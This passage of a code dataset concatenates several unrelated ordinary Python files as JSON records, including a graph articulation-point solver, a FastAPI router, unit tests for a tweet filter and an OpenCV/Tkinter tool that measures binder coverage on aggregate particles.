filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n trip = list(np.ravel(trip_data))\n return jsonify(trip)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"jwhite1987/Climate-Analysis","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39913753274","text":"import random\nimport numpy as np\nimport cv2.cv2 as cv2\nimport torch.utils.data as data\nfrom data import common\nfrom .tools import get_circle_matrix\n\n\nclass Dataset(data.Dataset):\n def __init__(self, args, mode='train'):\n super(Dataset, self).__init__()\n self.args = args\n self.mode = mode\n\n self.rotational = args.rotational\n self.height = args.rotational_height\n self.width = args.rotational_width\n self.rotational_patch_size = args.patch_size\n self.noise_level = args.noise_level\n\n self.step_range = args.rotational_test_step\n\n self.testangle = 3.0\n\n center = (int(self.height / 2), int(self.width / 2))\n circle_dic, radius, hole_matrix = get_circle_matrix((self.height, self.width), center=center)\n self.circle_dic = circle_dic\n self.radius = radius\n self.hole_matrix = hole_matrix\n\n def set_teststep(self, testangle):\n self.testangle = testangle\n return\n\n def __getitem__(self, idx):\n\n pad_width = 0\n if self.mode == 'train':\n blurred_path = self.datasets['train'][idx]\n sharp_path = blurred_path.replace('/blur/', '/sharp/')\n\n blurred = cv2.imread(blurred_path, -1)\n sharp = cv2.imread(sharp_path, -1)\n imgs = [blurred, sharp]\n imgs = common.chose_part(*imgs, ps=self.rotational_patch_size)\n if self.args.augment:\n imgs = common.augment(*imgs, hflip=True, rot=True, shuffle=True, change_saturation=False,\n rgb_range=self.args.rgb_range)\n\n else:\n step = self.testangle\n blurred_path = self.datasets[step][idx]\n sharp_path = blurred_path.replace('/blur/', '/sharp/')\n blurred = cv2.imread(blurred_path)\n sharp = cv2.imread(sharp_path)\n imgs = [blurred, sharp]\n\n if self.args.gaussian_pyramid:\n imgs = common.generate_pyramid(*imgs, n_scales=self.args.n_scales)\n\n imgs = common.np2tensor(*imgs)\n relpath = blurred_path.split('/')[-1].split('start')[0] + '.bmp'\n blur = imgs[0]\n sharp = imgs[1] if len(imgs) > 1 else False\n blur_field = 1\n\n return blur, sharp, pad_width, blur_field, idx, relpath\n\n def __len__(self):\n if self.mode == 'train':\n return len(self.datasets[self.mode])\n else:\n return len(self.datasets[self.step_range[0]])","repo_name":"Jinhui-Qin/RotaryDeblurring","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11926920702","text":"from sys import stdin\r\ndef dfs(u,parent,ap,depth,low):\r\n\tglobal G\r\n\tchildren = 0\r\n\r\n\tfor v in G[u]:\r\n\t\tif depth[v] ==-1:\r\n\t\t\tdepth[v] = low[v] = depth[u]+1\r\n\t\t\tparent[v] = u\r\n\t\t\tchildren+=1\r\n\t\t\tdfs(v,parent,ap,depth,low)\r\n\t\t\tlow[u] = min(low[u],low[v])\r\n\t\t\tif parent[u] == -1 and children > 1:\r\n\t\t\t\tap[u] = 1\r\n\t\t\tif parent[u] != -1 and low[v] >= depth[u]:\r\n\t\t\t\tap[u] = 1\r\n\t\telif depth[v] < depth[u]:\r\n\t\t\tlow[u] = min(low[u],depth[v])\r\n\treturn\r\n\r\ndef tarjan():\r\n\tglobal G\t\r\n\tn = len(G)\r\n\tparent = [-1 for _ in range(n)]\r\n\tap=[0 for _ in range(n)]\r\n\tdepth = [-1 for _ in range(n)]\r\n\tlow = [-1 for _ in range(n)]\r\n\tfor u in range(n):\r\n\t\tif depth[u]==-1:\r\n\t\t\tdepth[u]=low[u]=0\r\n\t\t\tdfs(u,parent,ap,depth,low)\r\n\t\r\n\tcap = 0\r\n\tfor i in range(n):\r\n\t\tif ap[i] == 1:\r\n\t\t\tcap+=1\r\n\tprint(cap)\r\n\t\t\t\r\n\treturn\r\ndef main():\r\n\tglobal G\r\n\tn = int(stdin.readline())\r\n\twhile n != 0:\r\n\t\tG = [[] for _ in range(n)]\r\n\t\tline = stdin.readline().strip().split()\r\n\t\twhile len(line)>1:\t\t\t\r\n\t\t\tindex = int(line[0])-1\t\t\t\r\n\t\t\ti = 1\r\n\t\t\twhile i < len(line):\r\n\t\t\t\tG[index].append(int(line[i])-1)\r\n\t\t\t\tG[int(line[i])-1].append(index)\t\t\t\t\r\n\t\t\t\ti+=1\r\n\t\t\tline = stdin.readline().strip().split()\r\n\t\ttarjan()\r\n\t\tn = int(stdin.readline())\r\n\treturn\r\nmain()\r\n\r\n\r\n\t\t\r\n","repo_name":"Juanma1909/AGRA","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72709529440","text":"from setuptools import setup\n\nwith open('README.md') as README:\n long_description = README.read()\nsetup(\n name='pydl',\n version='0.1d',\n packages=['pydl', ],\n license='MIT',\n description='A Library to download music from Youtube , Soundcloud and many others sites',\n long_description=long_description,\n author='Ayan Bag',\n author_email='ayanbag9474@gmail.com',\n install_requires=[\n 'requests',\n 'youtube-dl',\n ],\n python_requires='>=3.4',\n classifiers=[\n \"Programming Language :: Python :: 3.5\",\n \"License :: OSI Approved :: MIT License\",\n ],\n entry_points=dict(console_scripts=[\n 'pydl = pydl.dlutil:main', ]),\n url='https://github.com/ayanbag/pydl',\n)","repo_name":"ayanbag/pydl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3127650881","text":"from fastapi import APIRouter, Depends, status, HTTPException\nfrom sqlalchemy.orm import Session\nfrom typing import List\n\nfrom ..database import get_db\nfrom .. import schemas\nfrom ..crud import audience\n\n\nrouter = APIRouter(\n prefix=\"/audiences\",\n tags=[\"audiences\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/\", response_model=List[schemas.AudienceBase])\ndef get_audiences(db: Session = Depends(get_db)):\n db_audience = audience.get_objs(db=db)\n\n return db_audience\n\n\n@router.get(\"/{id}\", response_model=schemas.AudienceBase)\ndef get_audience(id: int, db: Session = Depends(get_db)):\n db_audience = audience.get_obj(db=db, id=id)\n\n if db_audience is None:\n raise HTTPException(status_code=404, detail=\"Audience not found\")\n return db_audience\n\n\n@router.post('/', status_code=status.HTTP_201_CREATED)\ndef create_audience(payload: schemas.AudienceBase, db: Session = Depends(get_db)):\n new_audience = audience.get_obj(db=db, id=payload.audience_number)\n if new_audience:\n raise HTTPException(status_code=400, detail=\"This number audience is exist\")\n\n new_audience = audience.create_obj(db=db, new_object=payload)\n return {\"status\": \"success\", \"object\": new_audience}","repo_name":"Xei201/university","sub_path":"src/university/routers/audience.py","file_name":"audience.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74395739360","text":"import pandas as pd\nimport sys\n\n\ndef compute_max_min(file):\n df = pd.read_csv(\n file,\n encoding=\"gbk\",\n header=0,\n index_col=0,\n sep=',',\n names=[\n 'Time',\n '330温度',\n '330湿度',\n '329温度',\n '329湿度',\n '327温度',\n '327湿度',\n '328温度',\n '328湿度',\n ],\n )\n\n df.loc['最大值'] = df.apply(lambda x: x.max())\n df.loc['最小值'] = df.apply(lambda x: x.min())\n df.loc['差值'] = df.apply(lambda x: float(x.max()) - float(x.min()))\n df.to_csv(\n 'new-' + file,\n encoding=\"gbk\",\n )\n pass\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n compute_max_min(file)","repo_name":"yuzhiyongcn/ExcelHandler","sub_path":"min_max/compute_min_max.py","file_name":"compute_min_max.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73687176801","text":"import unittest\n\nfrom parameterized import parameterized\n\nfrom mimicbot import filter\n\nclass TestFilter(unittest.TestCase):\n\n filter = None\n\n def __init__(self, *args, **kwargs):\n super(TestFilter, self).__init__(*args, **kwargs)\n self.filter = filter.Filter()\n\n def test_check_not_empty(self):\n func = self.filter.check_not_empty\n self.assertRaises(Exception, lambda: func(\"\"))\n\n def test_check_too_long_pass(self):\n func = self.filter.check_too_long\n text = \"a\" * 140\n func(text)\n\n def test_check_too_long_fail(self):\n func = self.filter.check_too_long\n text = \"a\" * 141\n self.assertRaises(Exception, lambda: func(text))\n\n @parameterized.expand([\n \"http\",\n \"https\",\n ])\n def test_check_contains_link_pass(self, text):\n func = self.filter.check_contains_link\n func(text)\n\n @parameterized.expand([\n \"http://example.com\",\n \"https://example.com\",\n ])\n def test_check_contains_link_fail(self, text):\n func = self.filter.check_contains_link\n self.assertRaises(Exception, lambda: func(text))\n\n def test_check_contains_username_pass(self):\n func = self.filter.check_contains_username\n text = \"@ username\"\n func(text)\n\n def test_check_contains_username_fail(self):\n func = self.filter.check_contains_username\n text = \"@username\"\n self.assertRaises(Exception, lambda: funct(text))\n\n @parameterized.expand([\n \"*action text*\",\n \"don't\",\n \"don’t\",\n \"\\\"double quotes\\\"\",\n \"'single quotes'\",\n \"'\\\"nested\\\" double quotes'\",\n \"\\\"'nested' single quotes\\\"\",\n \"“double curly quotes”\",\n \"‘single curly quotes’\",\n \"‘“nested” double curly quotes’\",\n \"“‘nested’ single curly quotes”\",\n \"(round braces)\",\n \"[square braces]\",\n \"{curly braces]}\",\n \"((nested) round brackets)\",\n \"[[nested] square brackets]\",\n \"{{nested} curly brackets}\",\n ])\n def test_check_syntax_pass(self, text):\n func = self.filter.check_syntax\n func(text)\n\n @parameterized.expand([\n \"*unbalanced action text\",\n \"don\\\"t\",\n \"don‘t\",\n \"don“t\",\n \"don”t\",\n \"\\\"unbalanced double quote\",\n \"'unbalanced single quote\",\n \"“unbalanced curly left double quote\",\n \"unbalanced curly right double quote”\",\n \"‘unbalanced curly left single quote\",\n \"unbalanced curly right single quote’\",\n \"(unbalanced opening round bracket\",\n \"unbalanced closing round bracket)\",\n \"[unbalanced opening square bracket\",\n \"unbalanced closing square bracket]\",\n \"{unbalanced opening curly bracket\",\n \"unbalanced closing curly bracket}\",\n \"((unbalanced nested opening round bracket)\",\n \"(unbalanced nested closing round bracket))\",\n \"[[unbalanced nested opening square bracket]\",\n \"[unbalanced nested closing square bracket]]\",\n \"{{unbalanced nested opening curly bracket}\",\n \"{unbalanced nested closing curly bracket}}\",\n ])\n def test_check_syntax_fail(self, text):\n func = self.filter.check_syntax\n self.assertRaises(Exception, lambda: func(text))\n","repo_name":"nomicode/mimicbot","sub_path":"tests/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21652384367","text":"from __future__ import print_function\nimport tensorflow as tf\n\nfilename_queue = tf.train.string_input_producer([\"data.csv\"])\n\nreader = tf.TextLineReader()\nkey, value = reader.read(filename_queue)\n\nrecord_defaults = [tf.as_string([1]), [1], [1], [1], [1], [1], [1], [1]]\ncol1, col2, col3, col4, col5, col6, col7, col8 = tf.decode_csv(\n value, record_defaults=record_defaults)\nfeatures = tf.stack([col2, col3, col4, col5, col6, col7, col8])\n\nwith tf.Session() as sess:\n # Start populating the filename queue.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for i in range(0,8):\n # Retrieve a single instance:\n try:\n example, label = sess.run([features, col1])\n print(example)\n print(label)\n except tf.errors.OutOfRangeError:\n break\n\n # for i in range(4, 8):\n # try:\n # example2, label2 = sess.run([features, col1])\n # print(example2)\n # print\n\n coord.request_stop()\n coord.join(threads)\n\n","repo_name":"dunkelhaus/cancerTherapy","sub_path":"modules/NeuralNet/core/classifiers/dnnClassifier/exampleCSVRead.py","file_name":"exampleCSVRead.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"4996143842","text":"import jittor as jt\nfrom j_nerf.Method.config import get_cfg\nfrom j_nerf.Method.global_vars import proj_options\nfrom jittor import Function\n\n\nclass SHEncoder(Function):\n def __init__(self):\n self.cfg = get_cfg()\n self.num_elements = 4194304\n self.m_n_padded_output_dims = 16\n self.m_sh_degree = 4\n self.m_n_to_pad = 0\n self.grad_type = \"float16\"\n header_path = \"../j-nerf/j_nerf/Cpp/sh_encoder/\"\n proj_options[f\"FLAGS: -I{header_path}\"] = 1\n self.out_dim = self.m_n_padded_output_dims\n return\n\n def execute(self, x):\n self.num_elements = x.shape[0]\n\n output = jt.code(\n (self.num_elements, 16),\n self.grad_type,\n [x],\n cuda_header='#include \"SphericalEncode.h\"',\n cuda_src=f\"\"\"\n \n #define grad_t out_type\n\n uint32_t num_elements=in0_shape0;\n uint32_t m_n_padded_output_dims={self.m_n_padded_output_dims};\n uint32_t m_sh_degree={self.m_sh_degree};\n uint32_t m_n_to_pad={self.m_n_to_pad};\n \n cudaStream_t stream=0;\n \n PitchedPtr inputs={{in0_p,in0_shape1}};\n\t\tPitchedPtr outputs={{out_p,out_shape1}};\n\t\tfloat* dy_dx = nullptr;\n linear_kernel(kernel_sh, 0, stream,\n\t\t\tnum_elements,\n\t\t\tm_sh_degree,\n\t\t\tm_n_to_pad,\n\t\t\tinputs,\n outputs,\n\t\t\tdy_dx\n\t\t);\n \"\"\",\n )\n output.compile_options = proj_options\n return output\n\n def grad(self, grad_x):\n return None\n","repo_name":"565353780/j-nerf","sub_path":"j_nerf/Model/sh_encoder.py","file_name":"sh_encoder.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73039339041","text":"import sys\nn = int(input())\nsigns = input().split()\ndp = [False] * 10\n\n\n\ndef possible(s, t, index):\n \n if signs[index] == \"<\":\n return s < t\n elif signs[index] == \">\":\n return s > t\n \nmx, mn = \"\", \"\"\ndef find(s, index):\n \n global mx, mn\n if index == n+1:\n if len(mn) == 0:\n mn = s\n else:\n mx = s\n return\n for i in range(10):\n if len(s) == 0:\n dp[i] = True\n find(s + str(i), index + 1)\n dp[i] = False\n elif not dp[i] and possible(s[-1], str(i), index - 1):\n dp[i] = True\n find(s + str(i), index + 1)\n dp[i] = False\n\nfind(\"\", 0)\nprint(mx)\nprint(mn)","repo_name":"jeean0668/algorithm","sub_path":"BS/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36806617785","text":"a = input (\"inter an integer:\\n\")\na = int(a)\nif (a < 0):\n print (\"-- enter a number greater than 0 --\")\nelif (a <= 2):\n print (\"no\")\nelse:\n i = 2\n # initialize a sum variable with 0\n s = 1\n while i < a:\n if (a % i == 0):\n s += i\n i += 1\n if (s == a):\n print(\"yes\")\n else:\n print(\"no\")\n","repo_name":"lachqarhamza/python-scripts","sub_path":"TP1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11657129779","text":"import cv2\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nimport os\nimport sys\nimport pandas as pd\nimport datetime\nimport re\n\n\nclass MainClass(object):\n\n def __init__(self):\n\n self.img_o = np.zeros((1, 1, 3), dtype='float32')\n self.img_find_lig = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo BRANCO para contabilizar os pixels pretos do ligante\n self.img_find_bri = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo PRETO para contabilizar os pixels pretos do brilho do ligante\n self.img_find_agr = np.zeros((1, 1, 3), dtype='float32') #imagem com fundo PRETO e partículas BRANCAS para contar os agregados (máscara completa)\n self.img_find_mrc = np.zeros((1, 1, 3), dtype='float32') #imagem com partículas marcadas de vermelho para avaliar a limiarização\n \n self.img_count_lig = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de ligante BRANCOS após limiarização (para contagagem)\n self.img_count_bri = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de brilho BRANCOS após limiarização (para contagagem)\n\n self.i_ligante = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de ligante VERMELHOS após limiarização\n self.i_brilho = np.zeros((1, 1, 3), dtype='float32') #imagem com pixels de brilho VERMELHOS após limiarização\n\n self.id = []\n self.nAgreg = []\n self.nLigan = []\n self.nBrilh = []\n self.nCobrimento = []\n self.estatistic = []\n self.valor_limiar_lig = 0\n self.valor_limiar_bri = 0\n\n self.pasta = 'C:/Covered_Area_results'\n\n self.list_contours = []\n\n self.absolute_path = os.path.dirname(__file__)\n\n self.root = Tk()\n self.root.title(\"Covered Area\")\n self.root.state('zoomed')\n self.root.resizable(width=False, height=False)\n\n self.fAcao = LabelFrame(self.root, text=\"Ações\")\n self.fImagens = LabelFrame(self.root, text=\"Exibição de imagens\")\n self.fLimiares = LabelFrame(self.root, text=\"Controle de limiares\")\n\n self.fAcao.grid(row=0, column= 0)\n self.fImagens.grid(row=1, column= 0)\n self.fLimiares.grid(row=2, column= 0)\n\n self.lOriginal = Label(self.fImagens, text=\"Imagem original\")\n self.lObjetos = Label(self.fImagens, text=\"Objetos detectados\")\n self.lLigante = Label(self.fImagens, text=\"Imagem do Ligante\")\n self.lBrilho = Label(self.fImagens, text=\"Imagem do Brilho do ligante\")\n\n self.lOriginal.grid(row=0, column= 0)\n self.lObjetos.grid(row=0, column= 1)\n self.lLigante.grid(row=0, column= 2)\n self.lBrilho.grid(row=0, column= 3)\n \n self.bAbrir = Button(self.fAcao, text=\"Abrir imagem\", width= 10, cursor=\"hand2\", command=self.openImg)\n self.bReiniciar = Button(self.fAcao, text=\"Reiniciar\", fg=\"red\", width= 10, cursor=\"hand2\", command=self.reiniciar)\n self.bProcessar = Button(self.fAcao, text=\"Processar\", width= 10, cursor=\"hand2\", command=self.processar)\n self.bCalcular = Button(self.fAcao, text=\"Calcular\", width= 10, cursor=\"hand2\", command=self.calcular)\n self.bGravar = Button(self.fAcao, text=\"Gravar\", width= 10, cursor=\"hand2\", command=self.gravar)\n self.lQuantidade = Label(self.fAcao, text=\"Partículas: 0\")\n self.lCalculos = Label(self.fAcao, text=\"Agregado | Ligante | Brilho | Área coberta média | Desv. Pad.:\\n0 | 0 | 0 | 0% | 0%\")\n self.lLocal = Label(self.fAcao, text=f\"Arquivos em: {self.pasta}\")\n self.lPasta = Label(self.fAcao, text=\"Gravar na pasta:\")\n self.ePasta = Entry(self.fAcao, width=30)\n\n self.bReiniciar.grid(row=0, column= 0, rowspan= 2, padx= 5, pady= 5)\n self.bAbrir.grid(row=0, column= 1, rowspan= 2, padx= 5, pady= 5)\n self.bProcessar.grid(row=0, column= 2, rowspan= 2, padx= 5, pady= 5)\n self.bCalcular.grid(row=0, column= 3, rowspan= 2, padx= 5, pady= 5)\n self.bGravar.grid(row=0, column= 4, rowspan= 2, padx= 5, pady= 5)\n self.lQuantidade.grid(row=0, column= 5, rowspan= 2, padx= 5, pady= 5)\n self.lCalculos.grid(row=0, column= 6, rowspan= 2, padx= 5, pady= 5)\n self.lLocal.grid(row=0, column= 7, columnspan= 2, padx= 5, pady= 5)\n self.lPasta.grid(row=1, column= 7, padx= 5, pady= 5)\n self.ePasta.grid(row=1, column= 8, padx= 5, pady= 5)\n\n self.limiarTextL = Label(self.fLimiares, text=\"Limiar para identificar o ligante\")\n self.limiarTextB = Label(self.fLimiares, text=\"Limiar para identificar o brilho ligante\")\n self.limiarL = Scale(self.fLimiares, width= 20, length= 300, from_= 0, to= 255, orient= HORIZONTAL, cursor=\"hand2\", command=self.sliderL)\n self.limiarB = Scale(self.fLimiares, width= 20, length= 300, from_= 0, to= 255, orient= HORIZONTAL, cursor=\"hand2\", command=self.sliderB)\n self.cHist = Canvas(self.fLimiares, bg=\"black\",width=256, height=256)\n self.lLimiar = Label(self.fLimiares, text=\"Aplicar segmentação\")\n self.bLimiar = Button(self.fLimiares, text=\"Limiares\", width= 10, cursor=\"hand2\", command= lambda: self.aplicando_limiar(self.img_find_lig.copy(), self.img_find_bri.copy()))\n self.bOtsu = Button(self.fLimiares, text=\"Otsu\", width= 10, cursor=\"hand2\", command= lambda: self.aplicando_otsu(self.img_find_lig.copy(), self.img_find_bri.copy()))\n\n self.cHist.grid(row= 0, column= 0, rowspan= 7)\n self.limiarTextL.grid(row= 0, column= 1, columnspan= 2)\n self.limiarL.grid(row= 1, column= 1, columnspan= 2)\n self.limiarTextB.grid(row= 2, column= 1, columnspan= 2)\n self.limiarB.grid(row= 3, column= 1, columnspan= 2)\n self.lLimiar.grid(row= 4, column= 1, columnspan= 2)\n self.bLimiar.grid(row= 5, column= 1)\n self.bOtsu.grid(row= 5, column= 2)\n\n\n self.limiarB.set(255)\n self.bProcessar.config(state=\"disabled\")\n self.bCalcular.config(state=\"disabled\")\n self.bGravar.config(state=\"disabled\")\n self.bLimiar.config(state=\"disabled\")\n self.bOtsu.config(state=\"disabled\")\n self.limiarL.config(state=\"disabled\")\n self.limiarB.config(state=\"disabled\")\n \n self.root.mainloop()\n\n def reiniciar(self):\n os.execl(sys.executable, sys.executable, *sys.argv) #comando para reiniciar a aplicação\n\n def openImg(self):\n try:\n self.root.filename = filedialog.askopenfilename(initialdir=self.absolute_path, title=\"Selecione um arquivo\", filetypes=((\"Arquivo jpg\", \"*.jpg\"), (\"Arquivo png\", \"*.png\")))\n except:\n pass\n\n if(len(str(self.root.filename)) > 0):\n i = cv2.imread(str(self.root.filename), cv2.IMREAD_UNCHANGED)\n i = cv2.cvtColor(i, cv2.COLOR_BGR2RGB)\n self.img_o = i.copy()\n\n dir_path = os.path.dirname(str(self.root.filename))\n self.ePasta.delete(0, END)\n self.ePasta.insert(0, dir_path)\n\n self.lLocal.config(text=\"Arquio: \"+str(self.root.filename))\n self.bProcessar.config(state=\"normal\")\n self.bCalcular.config(state=\"disabled\")\n self.bGravar.config(state=\"disabled\")\n self.bLimiar.config(state=\"disabled\")\n self.bOtsu.config(state=\"disabled\")\n self.limiarL.config(state=\"disabled\")\n self.limiarB.config(state=\"disabled\")\n self.showImg(i, self.lOriginal)\n \n def showImg(self, img, place):\n i = img.copy()\n i = (i.astype('float32'))/255\n i_resize = self.resize(i)\n e_array = np.uint8((i_resize * 255))\n i_p = Image.fromarray(e_array)\n i_t = ImageTk.PhotoImage(i_p)\n place.config(image=i_t)\n place.image = i_t\n\n def resize(self, img):\n width_img = int(img.shape[1])\n height_img = int(img.shape[0])\n p=1.0\n\n w_r = self.root.winfo_width()\n h_r = self.root.winfo_height()\n h_fAcao = self.fAcao.winfo_reqheight()\n h_fLim = self.fLimiares.winfo_reqheight()\n\n max_height = h_r - (h_fAcao + h_fLim) - 5\n max_width = (w_r/4) - 5\n\n scale_h = max_height/height_img\n scale_w = max_width/width_img\n\n if scale_w < scale_h:\n p = scale_w\n else:\n p = scale_h\n\n # if width_img >= height_img:\n # if(width_img >= w_r/4):\n # p = (w_r/4 - 30)/width_img\n # else:\n # p = 1.0\n # else:\n # if(height_img >= h_r - (h_fAcao + h_fLim)):\n # p = (h_r - (h_fAcao + h_fLim) - 30)/height_img\n # else:\n # p = 1.0\n\n width_r = int(img.shape[1]*p)\n height_r = int(img.shape[0]*p)\n dim = (width_r, height_r)\n img_r = cv2.resize(img.copy(), dim)\n return img_r\n\n def processar(self):\n i = self.img_o.copy()\n self.find_contours(i)\n self.images_find(self.img_o.copy(), self.list_contours)\n self.drawHist(self.img_find_lig)\n \n self.bProcessar.config(state=\"disable\")\n self.bOtsu.config(state=\"normal\")\n self.limiarL.config(state=\"normal\")\n self.limiarB.config(state=\"normal\")\n \n def find_contours(self, img):\n i = img.copy()\n i = cv2.cvtColor(i, cv2.COLOR_RGB2LAB)\n a = i[:, :, 1]\n th = cv2.threshold(a,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n kernel = np.ones((5,5),np.uint8)\n i_close = cv2.morphologyEx(th, cv2.MORPH_CLOSE, kernel)\n c_raw, h = cv2.findContours(i_close, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n c = self.filter_c(c_raw)\n \n i_marcada = img.copy()\n\n id_list = []\n count = 0\n for x in range(len(c)):\n M = cv2.moments(c[x])\n if (M['m00'] > 0):\n self.list_contours.append(c[x])\n\n M = cv2.moments(c[x])\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n count+=1\n id_list.append(count)\n i_marcada = cv2.drawContours(i_marcada, c, x, (255, 0, 0), -1)\n i_marcada = cv2.putText(i_marcada, f\"{count}\", (cx-15, cy+15), cv2.FONT_HERSHEY_DUPLEX, 2, (0, 0, 255), 2)\n \n self.id = id_list\n self.img_find_mrc = i_marcada.copy()\n self.showImg(self.img_find_mrc, self.lObjetos)\n self.lQuantidade.config(text= f\"Partículas: {len(self.list_contours)}\")\n\n def images_find(self, img, contours):\n imgL = img.copy()\n imgB = img.copy()\n img_black = np.zeros(shape=img.shape, dtype=img.dtype)\n \n i_mask = cv2.drawContours(img_black, contours, -1, (255, 255, 255), -1)[:, :, 1]\n self.img_find_agr = i_mask.copy()\n\n i_mask_inv = 255 - i_mask\n imgL[i_mask_inv == 255] = (255, 255, 255)\n imgB[i_mask_inv == 255] = (0, 0, 0)\n\n self.img_find_lig = imgL\n self.img_find_bri = imgB\n \n def drawHist(self, im):\n img = cv2.cvtColor(im.copy(), cv2.COLOR_RGB2GRAY)\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n\n sorted_array = sorted(hist, reverse=True)\n maxHist = sorted_array[1][0]\n\n self.cHist.delete('all')\n for i in range(256):\n v = float(hist[i])\n v = (v/maxHist)*255\n v = 256 - v\n if(v <= 255):\n self.cHist.create_line(i, 255, i, v, fill='red', width=1)\n\n def sliderL(self, var):\n t = float(self.limiarL.get())\n self.cHist.delete('t1')\n self.cHist.create_line(t, 255, t, 0, fill='yellow', width=1, tag='t1')\n\n self.bLimiar.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.bCalcular.config(state=\"disable\")\n\n def sliderB(self, var):\n t = float(self.limiarB.get())\n self.cHist.delete('t2')\n self.cHist.create_line(t, 255, t, 0, fill='white', width=1, tag='t2')\n \n self.bGravar.config(state=\"disable\")\n self.bCalcular.config(state=\"disable\")\n\n def aplicando_limiar(self, imgL, imgB):\n ll = self.limiarL.get()\n lb = self.limiarB.get()\n il_cinza = cv2.cvtColor(imgL, cv2.COLOR_RGB2GRAY)\n ib_cinza = cv2.cvtColor(imgB, cv2.COLOR_RGB2GRAY)\n retl, i_ll = cv2.threshold(il_cinza, ll, 255, cv2.THRESH_BINARY_INV)\n retb, i_lb = cv2.threshold(ib_cinza, lb, 255, cv2.THRESH_BINARY)\n\n i_o_l = self.img_o.copy()\n i_o_b = self.img_o.copy()\n i_o_l[i_ll == 255] = (255, 0, 0)\n i_o_b[i_lb == 255] = (255, 0, 0)\n\n self.img_count_lig = i_ll\n self.img_count_bri = i_lb\n\n self.i_ligante = i_o_l\n self.i_brilho = i_o_b\n\n self.bCalcular.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.showImg(i_o_l, self.lLigante)\n self.showImg(i_o_b, self.lBrilho)\n\n def aplicando_otsu(self, imgL, imgB):\n ll = self.limiarL.get()\n lb = self.limiarB.get()\n il_cinza = cv2.cvtColor(imgL, cv2.COLOR_RGB2GRAY)\n ib_cinza = cv2.cvtColor(imgB, cv2.COLOR_RGB2GRAY)\n retl, i_ll = cv2.threshold(il_cinza, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n retb, i_lb = cv2.threshold(ib_cinza, lb, 255, cv2.THRESH_BINARY)\n\n t = float(retl)\n self.limiarL.set(t)\n self.cHist.delete('t1')\n self.cHist.create_line(t, 255, t, 0, fill='yellow', width=1, tag='t1')\n\n i_o_l = self.img_o.copy()\n i_o_b = self.img_o.copy()\n i_o_l[i_ll == 255] = (255, 0, 0)\n i_o_b[i_lb == 255] = (255, 0, 0)\n\n self.img_count_lig = i_ll\n self.img_count_bri = i_lb\n\n self.i_ligante = i_o_l\n self.i_brilho = i_o_b\n\n self.bCalcular.config(state=\"normal\")\n self.bGravar.config(state=\"disable\")\n self.showImg(i_o_l, self.lLigante)\n self.showImg(i_o_b, self.lBrilho)\n\n def filter_c(self, contours_c):\n \n lenghts = []\n\n for i in contours_c:\n lenghts.append(len(i))\n\n q1 = np.percentile(np.array(lenghts), 25)\n q3 = np.percentile(np.array(lenghts), 75)\n diff = q3-q1\n factor = 1.5\n threshold = q1-(factor*diff)\n \n c_copy = np.copy(contours_c)\n for i, c in enumerate(contours_c):\n if lenghts[i] < threshold or lenghts[i] == threshold:\n c_copy[i] = None\n\n c_filtered = [c for c in c_copy if c is not None]\n return c_filtered\n\n def calcular(self):\n self.contar_pixel(self.list_contours, self.img_find_agr, 1)\n self.contar_pixel(self.list_contours, self.img_count_lig, 2)\n self.contar_pixel(self.list_contours, self.img_count_bri, 3)\n\n cobrimento = []\n statistic = []\n for i in range(len(self.nAgreg)):\n cobrimento.append(100*(self.nLigan[i] + self.nBrilh[i])/self.nAgreg[i])\n statistic.append('')\n\n self.nCobrimento = cobrimento\n a_cobrimento = np.asarray(cobrimento)\n \n media = np.average(a_cobrimento)\n desv_pad = np.std(a_cobrimento)\n self.valor_limiar_lig = float(self.limiarL.get())\n self.valor_limiar_bri = 